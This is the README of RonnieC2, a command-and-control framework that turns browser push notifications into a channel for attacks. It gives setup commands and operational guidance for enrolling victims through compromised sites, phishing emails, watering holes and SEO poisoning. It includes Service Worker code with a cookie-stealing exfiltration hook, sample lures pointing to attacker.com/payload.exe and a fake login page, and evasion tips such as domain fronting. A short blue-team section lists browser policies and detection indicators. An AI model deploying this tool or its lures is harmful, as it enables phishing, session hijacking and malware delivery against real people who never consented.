Project Overview
RonnieC2 is a proof-of-concept Command & Control framework that weaponizes browser push notifications for covert command and control operations. Unlike traditional C2 frameworks that require malware installation, RonnieC2 leverages legitimate browser APIs to maintain persistent access to victim systems through a simple notification permission.
██████╗ ██████╗ ╗███╗ ██╗███╗ ██╗██╗███████╗ ██████╗██████╗
██╔══██╗██╔═══██╗║████╗ ██║████╗ ██║██║██╔════╝ ██╔════╝╚════██╗
██████╔╝██║ ██║║██╔██╗ ██╗██╔██╗ ██║██║█████╗ ██║ █████╔╝
██╔══██╗██║ ██║║██║╚██╗██╗██║╚██╗██║██║██╔══╝ ██║ ██╔═══╝
██║ ██║╚██████╔╝║██║ ╚████╗██║ ╚████║██║███████╗ ╚██████╗███████╗
╚═╝ ╚═╝ ╚═════╝ ╚══╝ ╚═══╝╚═╝ ╚═══╝╚═╝╚══════╝ ╚═════╝╚══════╝
GitHub: https://github.com/PowerJoe/RonnieC2
Inspiration & Research
RonnieC2 was inspired by the Matrix Push C2 malware campaign discovered in late 2024, which demonstrated that browser push notifications could be effectively weaponized for command and control operations. This project explores the offensive security implications of this technique in a controlled, educational environment.
Key Features
Core Capabilities
- 🔔 Push Notification C2 - Command delivery via browser notifications
- 🎣 Social Engineering - Craft custom phishing lures and fake security alerts
- 🍪 Session Hijacking - Steal and exfiltrate session cookies
- 🔍 Browser Fingerprinting - Collect detailed victim system information
- 📊 Real-time Dashboard - Web-based C2 operator interface
- 🎯 Campaign Management - Organize and track notification campaigns
- 📈 Click Tracking - Monitor victim interactions and engagement
Technical Advantages
✅ No Malware Installation - Uses legitimate browser APIs
✅ Persistent Access - Survives browser/tab closure
✅ Cross-Platform - Works on Windows, macOS, and Linux
✅ EDR Evasion - Bypasses traditional endpoint security
✅ Legitimate Infrastructure - Uses browser push services (Mozilla, Google)
✅ HTTPS Communication - Encrypted by default
✅ VAPID Authentication - Industry-standard push notification auth
Architecture
┌─────────────┐ ┌──────────────┐ ┌─────────────┐
│ Victim │ HTTPS │ Ronnie C2 │ WebPush │ Browser │
│ Browser ├────────►│ Server ├────────►│Push Service │
│ │ │ (Flask) │ │ (Mozilla) │
└─────────────┘ └──────────────┘ └─────────────┘
│ │
│ Enrollment │ Send Notification
└───────────────────────►│
│
┌────────────────────────┘
│ Push Notification
▼
┌─────────────┐
│ Victim │
│Notification │
└─────────────┘
Component Breakdown
Server-Side (Flask)
- app.py - Main Flask application and routing
- models/ - Database models for agents, commands, campaigns
- routes/ - API endpoints for C2 operations
- utils/ - VAPID key management and push notification sender
Client-Side
- victim.html - Enrollment page with permission request
- sw.js - Service Worker for notification handling
- static/js/ - Client-side JavaScript for fingerprinting
Communication Flow
- Victim visits phishing/compromised page
- Service Worker registers and requests notification permission
- Browser generates push subscription endpoint
- Subscription sent to C2 server
- C2 operator sends notification with malicious payload
- Notification triggers action (phishing, cookie theft, redirection)
Installation & Setup
Prerequisites
# System requirements
Python 3.9+
OpenSSL
Modern browser (Chrome, Firefox, Edge)
Quick Start
# Clone repository
git clone https://github.com/PowerJoe/RonnieC2.git
cd RonnieC2
# Create virtual environment
python3 -m venv RonnieC2
source RonnieC2/bin/activate # Linux/Mac
# Install dependencies
pip install -r requirements.txt
# Generate VAPID keys
python3 vapid_keys.py
# Generate SSL certificates
openssl req -x509 -newkey rsa:4096 -nodes \
-out cert.pem -keyout key.pem -days 365 \
-subj "/CN=localhost"
# Run server
python3 app.py
Access the C2 dashboard at: https://localhost:5000/c2
Operational Usage
1. Deploy Victim Page
The enrollment page is served at https://localhost:5000/
Deployment Scenarios:
- Inject into compromised websites
- Social engineering campaigns
- Shortened URLs in phishing emails
- Watering hole attacks
- SEO poisoning
2. Victim Enrollment
Attack Flow:
- Victim visits malicious page
- “Enable Notifications” button displayed with social engineering
- Browser requests permission
- Victim grants permission (often without reading)
- Push subscription created and sent to C2
- Agent appears in dashboard
3. Command & Control
From the C2 dashboard, operators can:
- View enrolled agents with browser fingerprints
- Send targeted push notifications
- Craft custom phishing messages
- Deploy fake security alerts
- Track click-through rates
- Steal session cookies on interaction
4. Attack Scenarios
Credential Phishing
Title: "Security Alert"
Body: "Your session has expired. Click to re-authenticate."
Target URL: https://fake-login-page.com
Malware Delivery
Title: "Software Update Available"
Body: "Critical security update ready. Click to install."
Target URL: https://attacker.com/payload.exe
Session Hijacking
Title: "Prize Winner!"
Body: "You've won $1000! Claim your prize now."
Action: Steal cookies when notification clicked
Technical Deep Dive
Web Push API
RonnieC2 leverages the W3C Web Push API specification:
// Service Worker registration
navigator.serviceWorker.register('/sw.js')
.then(registration => {
return registration.pushManager.subscribe({
userVisibleOnly: true,
applicationServerKey: urlBase64ToUint8Array(publicVapidKey)
});
})
.then(subscription => {
// Send subscription to C2 server
fetch('/subscribe', {
method: 'POST',
body: JSON.stringify(subscription),
headers: {
'Content-Type': 'application/json'
}
});
});
VAPID Authentication
Voluntary Application Server Identification (VAPID) provides authentication:
from py_vapid import Vapid
# Generate keys
vapid = Vapid()
vapid.generate_keys()
vapid.save_public_key('public_key.pem')
vapid.save_key('private_key.pem')
# Sign push message
vapid_claims = {
"sub": "mailto:[email protected]",
"exp": int(time.time()) + 86400
}
headers = vapid.sign(vapid_claims)
Persistence Mechanism
Service Workers provide persistence:
// Service Worker (sw.js)
self.addEventListener('push', event => {
const data = event.data.json();
const options = {
body: data.body,
icon: data.icon,
data: {
url: data.targetUrl,
action: data.action
}
};
event.waitUntil(
self.registration.showNotification(data.title, options)
);
});
self.addEventListener('notificationclick', event => {
event.notification.close();
// Execute malicious action
if (event.notification.data.action === 'steal_cookies') {
exfiltrateData();
}
clients.openWindow(event.notification.data.url);
});
Defense & Detection
Blue Team Perspective
Prevention
Browser Policies:
# Chrome GPO
NotificationsBlockedForUrls = ["*"]
NotificationsAllowedForUrls = ["https://trusted-domain.com"]
# Firefox
Permissions.default.desktop-notification = 2
# Edge (Chromium)
DefaultNotificationsSetting = 2
User Training:
- Educate on permission request risks
- Default deny notification permissions
- Review granted permissions regularly
Detection
Monitoring:
- Alert on notification permission grants from suspicious domains
- Log browser telemetry for permission changes
- Monitor for rapid permission grants (potential compromise)
- Analyze notification API usage patterns
SOC Indicators:
- Unusual domains requesting notifications
- High-frequency notification API calls
- Notifications from newly registered domains
- Push subscriptions to non-standard endpoints
Red Team OPSEC
Operational Security:
- Use trusted/compromised domains for hosting
- Implement domain fronting via CDNs
- Rotate notification content and timing
- Clean up subscriptions post-assessment
- Obtain proper authorization before deployment
Project Structure
RonnieC2/
├── app.py # Main Flask application
├── models/ # Database models
│ ├── agent.py # Agent tracking
│ ├── command.py # Command history
│ └── campaign.py # Campaign management
├── routes/ # API endpoints
│ ├── main.py # Landing pages
│ ├── agents.py # Agent management
│ ├── commands.py # Notification sending
│ └── stats.py # Dashboard analytics
├── templates/ # HTML templates
│ ├── dashboard.html # C2 operator interface
│ └── victim.html # Enrollment page
├── utils/ # Utilities
│ ├── vapid.py # VAPID key management
│ └── push.py # Push sender
├── sw.js # Service Worker
└── requirements.txt # Dependencies
Legal & Ethical Considerations
⚠️ FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY
This tool is designed for:
- Security research and education
- Authorized penetration testing with written permission
- Red team assessments within scope
- Demonstrating browser-based attack vectors
UNAUTHORIZED USE IS ILLEGAL
We assume NO liability for misuse. By using RonnieC2, you agree to:
- Only test systems you own or have explicit authorization to test
- Comply with all applicable laws and regulations
- Use the tool ethically and responsibly
- Not deploy against real users without consent
Future Enhancements
Potential additions for educational purposes:
- Multi-Operator Support - Team-based C2 operations
- Custom Payloads - Dynamic JavaScript injection
- Geolocation Tracking - Track victim movement
- Screenshot Capture - Via notification actions
- Encrypted C2 Channels - End-to-end encryption
- Automated Campaigns - Scheduled notification delivery
Resources & References
- Matrix Push C2 Analysis - The Hacker News
- Web Push API - MDN Documentation
- Service Workers - W3C Specification
- VAPID Specification - RFC 8292
Credits
Developed by: PJ131 & The Cyberpreneur
Special Acknowledgments:
- Inspired by Matrix Push C2 research
- OWASP for security resources
- Flask and Python communities
Conclusion
RonnieC2 demonstrates how legitimate browser features can be weaponized for offensive security operations. By understanding these techniques, security professionals can better defend against browser-based C2 channels and educate users on the risks of granting unnecessary browser permissions.
Remember: With great power comes great responsibility. Use this knowledge to build better defenses, not to cause harm.
⚡ Built for Education | Use Responsibly ⚡